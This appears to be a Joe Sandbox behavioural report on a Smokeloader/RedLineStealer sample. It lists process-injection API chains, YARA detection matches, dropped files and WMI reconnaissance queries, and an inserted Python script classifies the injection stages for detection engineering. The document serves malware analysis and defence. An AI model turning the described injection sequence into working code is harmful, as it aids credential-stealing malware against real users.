Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_00401508 NtAllocateVirtualMemory,6_2_00401508
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_004014CF NtAllocateVirtualMemory,6_2_004014CF
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015D5
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_004014DE NtAllocateVirtualMemory,6_2_004014DE
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015DF
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015E6
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015F2
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_004014F5 NtAllocateVirtualMemory,6_2_004014F5
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_004014F8 NtAllocateVirtualMemory,6_2_004014F8
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_004014FB NtAllocateVirtualMemory,6_2_004014FB
Source: C:\Users\user\AppData\Roaming\uejbbri | Code function: 7_2_00403043 RtlCreateUserThread,NtTerminateProcess,7_2_00403043
Source: C:\Users\user\AppData\Roaming\uejbbri | Code function: 7_2_004014C4 LocalAlloc,NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004014C4
Source: C:\Users\user\AppData\Roaming\uejbbri | Code function: 7_2_00401508 NtAllocateVirtualMemory,7_2_00401508
Source: C:\Users\user\AppData\Roaming\uejbbri | Code function: 7_2_004014CF NtAllocateVirtualMemory,7_2_004014CF
Source: C:\Users\user\AppData\Roaming\uejbbri | Code function: 7_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015D5
Source: C:\Users\user\AppData\Roaming\uejbbri | Code function: 7_2_004014DE NtAllocateVirtualMemory,7_2_004014DE
Source: C:\Users\user\AppData\Roaming\uejbbri | Code function: 7_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015DF
Source: C:\Users\user\AppData\Roaming\uejbbri | Code function: 7_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015E6
Source: C:\Users\user\AppData\Roaming\uejbbri | Code function: 7_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015F2
Source: C:\Users\user\AppData\Roaming\uejbbri | Code function: 7_2_004014F5 NtAllocateVirtualMemory,7_2_004014F5
Source: C:\Users\user\AppData\Roaming\uejbbri | Code function: 7_2_004014F8 NtAllocateVirtualMemory,7_2_004014F8
Source: C:\Users\user\AppData\Roaming\uejbbri | Code function: 7_2_004014FB NtAllocateVirtualMemory,7_2_004014FB
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03274B92 RtlMoveMemory,NtUnmapViewOfSection,9_2_03274B92
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_032733C3 NtQueryInformationFile,9_2_032733C3
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0327342B NtQueryObject,NtQueryObject,RtlMoveMemory,9_2_0327342B
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0327349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,9_2_0327349B
Source: C:\Windows\explorer.exe | Code function: 11_2_001D38B0 NtUnmapViewOfSection,11_2_001D38B0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_03221016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,12_2_03221016
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_03221A80 NtCreateSection,NtMapViewOfSection,12_2_03221A80
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_03221819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,12_2_03221819
Source: C:\Windows\explorer.exe | Code function: 13_2_00D2355C NtUnmapViewOfSection,13_2_00D2355C
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_03091016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,16_2_03091016
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_03091B26 NtCreateSection,NtMapViewOfSection,16_2_03091B26
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_030918BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,16_2_030918BF
                Source: C:\Windows\explorer.exeCode function: 18_2_0062370C NtUnmapViewOfSection,18_2_0062370C
                Source: C:\Users\user\AppData\Local\Temp\B575.exe Code function: 8_2_00007FF7CB879AC8
                Source: C:\Users\user\AppData\Local\Temp\B575.exe Code function: 8_2_00007FF7CB87B424
                Source: C:\Users\user\AppData\Local\Temp\B575.exe Code function: 8_2_00007FF7CB873220
                Source: C:\Users\user\AppData\Local\Temp\B575.exe Code function: 8_2_00007FF7CB87DC08
                Source: C:\Users\user\AppData\Local\Temp\B575.exe Code function: 8_2_00007FF7CB87A51C
                Source: C:\Users\user\AppData\Local\Temp\B575.exe Code function: 8_2_00007FF7CB87213C
                Source: C:\Users\user\AppData\Local\Temp\B575.exe Code function: 8_2_00007FF7CB87A774
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_03272198
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0328B35C
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0327C2F9
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_032C4438
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_0328B97E
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_03295F08
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_03276E6A
                Source: C:\Windows\explorer.exe Code function: 11_2_001D1E20
                Source: C:\Windows\explorer.exe Code function: 13_2_00D22054
                Source: C:\Windows\explorer.exe Code function: 13_2_00D22860
                Source: C:\Windows\explorer.exe Code function: 18_2_006220F4
                Source: C:\Windows\explorer.exe Code function: 18_2_00622A04
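The API chains listed above are the stages of the injection this report flags: NtCreateSection/NtMapViewOfSection in the dropped uejbbri copy (mapping a section into another process), OpenProcess followed by NtUnmapViewOfSection and then WriteProcessMemory/CreateRemoteThread inside the injected explorer.exe, and a CreateToolhelp32Snapshot/Process32First/Process32Next loop of lstrcmpiA calls that hunts for a target process by name. The Python below is an added example, not part of the Joe Sandbox report, that parses "Code function" rows of this shape and groups each source binary's functions by those stages. The stage names and the API sets behind them are this example's own heuristics; the sample rows are abridged copies of rows from this report; the function id is matched as two decimal fields and a hex address, which is an assumption about the report's numbering.

```python
"""Group Joe Sandbox 'Code function' rows by the injection stage their API
chain indicates.  Added example for this report, not Joe Sandbox code."""
import re
from collections import defaultdict

# Heuristic API sets (this example's own, not from the report): a function whose
# chain contains every API of a set is tagged with that stage.
PATTERNS = {
    "section_mapping_injection": {"NtCreateSection", "NtMapViewOfSection"},
    "remote_thread_injection": {"WriteProcessMemory", "CreateRemoteThread"},
    "remote_image_unmap": {"OpenProcess", "NtUnmapViewOfSection"},
    "process_enumeration": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
}

# Function id assumed to be <n>_<n>_<address> with an 8- or 16-digit hex address.
ROW_RE = re.compile(
    r"Source:\s*(?P<src>.*?)\s*Code function:\s*"
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]{8}(?:[0-9A-Fa-f]{8})?)\s*(?P<rest>.*)$"
)

# Abridged copies of rows from this report (the long lstrcmpiA runs are cut).
SAMPLE_ROWS = [
    r"Source: C:\Users\user\AppData\Roaming\uejbbri Code function: 7_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015D5",
    r"Source: C:\Windows\SysWOW64\explorer.exe Code function: 12_2_03221016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,Process32Next,CloseHandle,Sleep,12_2_03221016",
    r"Source: C:\Windows\SysWOW64\explorer.exe Code function: 12_2_03221819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,RtlMoveMemory,CreateMutexA,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,12_2_03221819",
    r"Source: C:\Windows\explorer.exe Code function: 11_2_001D1E2011_2_001D1E20",
]


def parse_row(line):
    """Return (source, fid, [apis]) for one row, or None if it is not a
    Code-function row.  The report repeats the fid at the end of the chain
    (sometimes fused to the previous token); the repeat is dropped."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    src, fid, rest = m.group("src"), m.group("fid"), m.group("rest")
    apis = [a for a in rest.split(",") if a and a != fid]
    return src, fid, apis


def classify(apis):
    """Stage names whose API set is fully present in the chain."""
    present = set(apis)
    return sorted(name for name, need in PATTERNS.items() if need <= present)


def summarize(lines):
    """source binary -> {stage: [fids that showed it]} over all rows."""
    hits = defaultdict(lambda: defaultdict(list))
    for line in lines:
        row = parse_row(line)
        if row is None:
            continue
        src, fid, apis = row
        for stage in classify(apis):
            hits[src][stage].append(fid)
    return {src: dict(stages) for src, stages in hits.items()}


if __name__ == "__main__":
    for src, stages in summarize(SAMPLE_ROWS).items():
        print(src)
        for stage, fids in stages.items():
            print(f"  {stage}: {', '.join(fids)}")
```

Run against the full report, the grouping separates the loader's own mapping primitives (in the uejbbri copy) from the remote-thread and unmap steps that only appear inside explorer.exe, which is the split a detection engineer wants when deciding which process to hunt in memory.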
                Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\B575.exe A6F7D8211414EF77E92730DB874BABF8F200B07C5AA194A71FA00F2C8BE5BDE7
                Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\E647.exe 2E4015F84A9A6D9C22EF65ACC66A3CF55C2CABC2D7A6F32B96297CA7D0F56EA4
                Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\uejbbri 2E4015F84A9A6D9C22EF65ACC66A3CF55C2CABC2D7A6F32B96297CA7D0F56EA4
                Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 03278801 appears 40 times
                Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 03277F70 appears 32 times
                Source: KTh1gQlT9a.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000004.00000002.2365373242.00000000026CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000007.00000002.2900663679.00000000025ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000004.00000002.2365295307.0000000002631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.2141528306.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000006.00000002.2655758710.00000000040F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000007.00000002.2900388143.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.2138650769.0000000002600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.2139720397.000000000265D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000006.00000002.2655596562.000000000266D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.2138710138.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000006.00000002.2655384170.0000000002620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000007.00000002.2900412124.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000006.00000002.2655265915.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000004.00000002.2365221336.0000000002520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000004.00000002.2365240792.0000000002530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000007.00000002.2900483247.00000000025B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@61/15@5/4
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exe Code function: 0_2_0266F92E CreateToolhelp32Snapshot,Module32First
                Source: C:\Users\user\AppData\Local\Temp\B575.exe Code function: 8_2_00007FF7CB877138 CoInitializeEx,CoInitializeSecurity,CoCreateInstance
                Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\esjbbri
                Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\E647.tmp
                Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
                Source: KTh1gQlT9a.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
                Source: C:\Users\user\AppData\Local\Temp\B575.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Local\Temp\B575.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
                Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
                Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, CommandLine, ExecutablePath, ProcessId FROM Win32_Process
                Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="332"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="420"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="496"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="504"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="564"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="632"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="640"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="752"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="780"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="788"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="872"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="924"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="992"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="444"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="732"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="280"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1032"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1056"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1068"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1148"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1188"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1232"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1324"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1384"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1416"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1424"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1460"::GetOwner
